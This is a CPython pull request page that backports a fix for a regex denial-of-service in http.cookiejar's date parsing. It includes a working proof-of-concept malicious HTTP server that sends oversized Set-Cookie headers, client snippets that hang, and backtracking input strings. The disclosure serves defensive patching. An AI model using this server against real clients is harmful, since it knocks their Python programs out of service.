Skip to content

Conversation

@vstinner
Copy link
Member

@vstinner vstinner commented Nov 22, 2019

The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

\d+-\w+-\d+(\s*\s*\s*)$ 

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!") 

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

from http.server import BaseHTTPRequestHandler, HTTPServer def make_set_cookie_value(n_spaces): spaces = " " * n_spaces expiry = f"1-c-1{spaces}!" return f"b;Expires={expiry}" class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(204) self.send_response_only(204) # Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) # Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65506 # Max header line length 65536 ) value = make_set_cookie_value(n_spaces) for i in range(99): # Not necessary, but we can have up to 100 header lines self.send_header("Set-Cookie", value) self.end_headers() if __name__ == "__main__": HTTPServer(("", 44020), Handler).serve_forever() 

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

import http.cookiejar, urllib.request cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) r = opener.open("http://localhost:44020/") 

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

import requests requests.get("http://localhost:44020/") 
  • Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

  • Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.

(cherry picked from commit 1b779bf)

https://bugs.python.org/issue38804

@vstinner
Copy link
Member Author

@serhiy-storchaka: Would you mind to review this straighforward (automated) backport of PR #17157 that you approved?

@vstinner
Copy link
Member Author

@bcaller: Would you mind to review this straighforward (automated) backport of your PR #17157?

@vstinner
Copy link
Member Author

@larryhastings: Would you mind to merge this straighforward backport (no conflict)? It has been approved by the author of the original change.

@vstinner
Copy link
Member Author

1 similar comment
@vstinner
Copy link
Member Author

@vstinner
Copy link
Member Author

Fresh ping @larryhastings: Can you please merge this PR into 3.5?

@larryhastings
Copy link
Contributor

It seems I'm not allowed to squash and merge until our iron-fisted new Codecov/patch overlord is satisfied.

@vstinner
Copy link
Member Author

It seems I'm not allowed to squash and merge until our iron-fisted new Codecov/patch overlord is satisfied.

Maybe try to copy .github/codecov.yml from master?

@larryhastings
Copy link
Contributor

I don't know anything about it. But, I interpreted the complaint of the robot to mean "the tests you added don't exercise all the code you added".

@vstinner
Copy link
Member Author

vstinner commented Apr 2, 2020

It seems I'm not allowed to squash and merge until our iron-fisted new Codecov/patch overlord is satisfied.

If I understood correctly, you cannot merge this security fix because of Codecov. I created https://bugs.python.org/issue40156 and #19309 to disable CodeCov in the 3.5 branch.

The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular expression denial of service (REDoS). LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar to parse Set-Cookie headers returned by a server. Processing a response from a malicious HTTP server can lead to extreme CPU usage and execution will be blocked for a long time. The regex contained multiple overlapping \s* capture groups. Ignoring the ?-optional capture groups the regex could be simplified to \d+-\w+-\d+(\s*\s*\s*)$ Therefore, a long sequence of spaces can trigger bad performance. Matching a malicious string such as LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!") caused catastrophic backtracking. The fix removes ambiguity about which \s* should match a particular space. You can create a malicious server which responds with Set-Cookie headers to attack all python programs which access it e.g. from http.server import BaseHTTPRequestHandler, HTTPServer def make_set_cookie_value(n_spaces): spaces = " " * n_spaces expiry = f"1-c-1{spaces}!" return f"b;Expires={expiry}" class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(204) self.send_response_only(204) # Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) # Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65506 # Max header line length 65536 ) value = make_set_cookie_value(n_spaces) for i in range(99): # Not necessary, but we can have up to 100 header lines self.send_header("Set-Cookie", value) self.end_headers() if __name__ == "__main__": HTTPServer(("", 44020), Handler).serve_forever() This server returns 99 Set-Cookie headers. Each has 65506 spaces. Extracting the cookies will pretty much never complete. Vulnerable client using the example at the bottom of https://docs.python.org/3/library/http.cookiejar.html : import http.cookiejar, urllib.request cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) r = opener.open("http://localhost:44020/") The popular requests library was also vulnerable without any additional options (as it uses http.cookiejar by default): import requests requests.get("http://localhost:44020/") * Regression test for http.cookiejar REDoS If we regress, this test will take a very long time. * Improve performance of http.cookiejar.ISO_DATE_RE A string like "444444" + (" " * 2000) + "A" could cause poor performance due to the 2 overlapping \s* groups, although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was. (cherry picked from commit 1b779bf)
@vstinner
Copy link
Member Author

vstinner commented Apr 3, 2020

PR rebased to get the Codecov CI fix.

@larryhastings larryhastings merged commit 55a6a16 into python:3.5 Apr 3, 2020
@bedevere-bot
Copy link

@larryhastings: Please replace # with GH- in the commit message next time. Thanks!

@larryhastings
Copy link
Contributor

Thanks, Victor!

@vstinner vstinner deleted the cookiejar_regex35 branch January 19, 2021 21:50
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

type-security A security issue

5 participants